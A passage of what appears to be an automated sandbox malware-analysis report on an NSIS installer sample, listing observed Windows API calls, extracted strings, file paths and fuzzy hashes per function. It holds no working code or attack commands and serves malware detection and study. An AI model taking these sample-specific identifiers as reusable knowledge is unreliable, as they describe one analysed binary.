\*.*, xrefs: 0040580D
C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-138588656
Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406666 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004062DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(751D3410,00421558,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
FindClose.KERNEL32(00000000), ref: 004062F4

Strings

C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 004062DD

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
API String ID: 2295610775-1038464266
Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9

Uniqueness

Uniqueness Score: -1.00%

Function 00403B94 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
ShowWindow.USER32(?), ref: 00403BED
DestroyWindow.USER32 ref: 00403C01
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
GetDlgItem.USER32(?,?), ref: 00403C3E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C52
IsWindowEnabled.USER32(00000000), ref: 00403C59
GetDlgItem.USER32(?,00000001), ref: 00403D07
GetDlgItem.USER32(?,00000002), ref: 00403D11
SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D7C
GetDlgItem.USER32(?,00000003), ref: 00403E22
ShowWindow.USER32(00000000,?), ref: 00403E43
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
EnableWindow.USER32(?,?), ref: 00403E70
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E86
EnableMenuItem.USER32(00000000), ref: 00403E8D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EA5
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403EB8
lstrlenA.KERNEL32(Nagari Setup: Installing,?,Nagari Setup: Installing,00000000), ref: 00403EE2
SetWindowTextA.USER32(?,Nagari Setup: Installing), ref: 00403EF1
ShowWindow.USER32(?,0000000A), ref: 00404025

Strings

Nagari Setup: Installing, xrefs: 00403ED2, 00403ED8, 00403EEF

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Nagari Setup: Installing
API String ID: 3282139019-2059581374
Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E

Uniqueness

Uniqueness Score: -1.00%

Function 004037F7 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F

lstrcatA.KERNEL32(1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000), ref: 00403872
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410), ref: 004038E7
lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
GetFileAttributesA.KERNEL32(Call), ref: 00403905
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E

Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45

RegisterClassA.USER32(00422EA0), ref: 0040398B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039A3
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039D8
ShowWindow.USER32(00000005,00000000), ref: 00403A0E
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
RegisterClassA.USER32(00422EA0), ref: 00403A50
DialogBoxParamA.USER32(?,00000000,00403B94,00000000), ref: 00403A6F

Strings

RichEd20, xrefs: 00403A14
Call, xrefs: 004038B5, 004038BD, 004038CA, 00403914, 0040391A
Control Panel\Desktop\ResourceLocale, xrefs: 0040382B
_Nb, xrefs: 0040396A, 004039D2
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 00403881, 00403889, 00403921, 00403927, 00403937
Nagari Setup: Installing, xrefs: 00403823, 00403829, 0040384E, 00403857, 0040386C
1033, xrefs: 00403817, 0040386D
.exe, xrefs: 004038F4
RichEdit20A, xrefs: 00403A32, 00403A38
RichEd32, xrefs: 00403A22
"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 004037FB
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
RichEdit, xrefs: 00403A41
.DEFAULT\Control Panel\International, xrefs: 0040385D

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$Nagari Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-8243168
Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DD5
GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\MaMsKRmgXZ.exe,00000400), ref: 00402DF1

Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00402E3D
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73

Strings

Null, xrefs: 00402EBB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
soft, xrefs: 00402EB2
C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00402DC4
Error launching installer, xrefs: 00402E14
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
C:\Users\user\Desktop\MaMsKRmgXZ.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
Inst, xrefs: 00402EA9

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MaMsKRmgXZ.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3633788662
Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000), ref: 0040613A
SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000), ref: 00406176
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
CoTaskMemFree.OLE32(00000000), ref: 00406190
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004060F6
Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll, xrefs: 00406021
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004061AE
Call, xrefs: 00406026, 004060F3, 004060F4, 004060F5, 00406111, 00406126, 00406139, 00406155, 00406180, 004061B3, 004061B9, 004061D1, 004061E4, 004061FF, 00406205, 0040620D, 00406237

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3542395414
Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7

Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 004017A3, 00401812, 00401830
C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll, xrefs: 00401826, 00401842
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp$C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae$Call
API String ID: 1941528284-709486518
Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405101 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll, xrefs: 00405121, 00405133, 00405139, 0040515C, 00405168

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll
API String ID: 2531174081-2854756067
Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004055C7 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
GetLastError.KERNEL32 ref: 0040561E
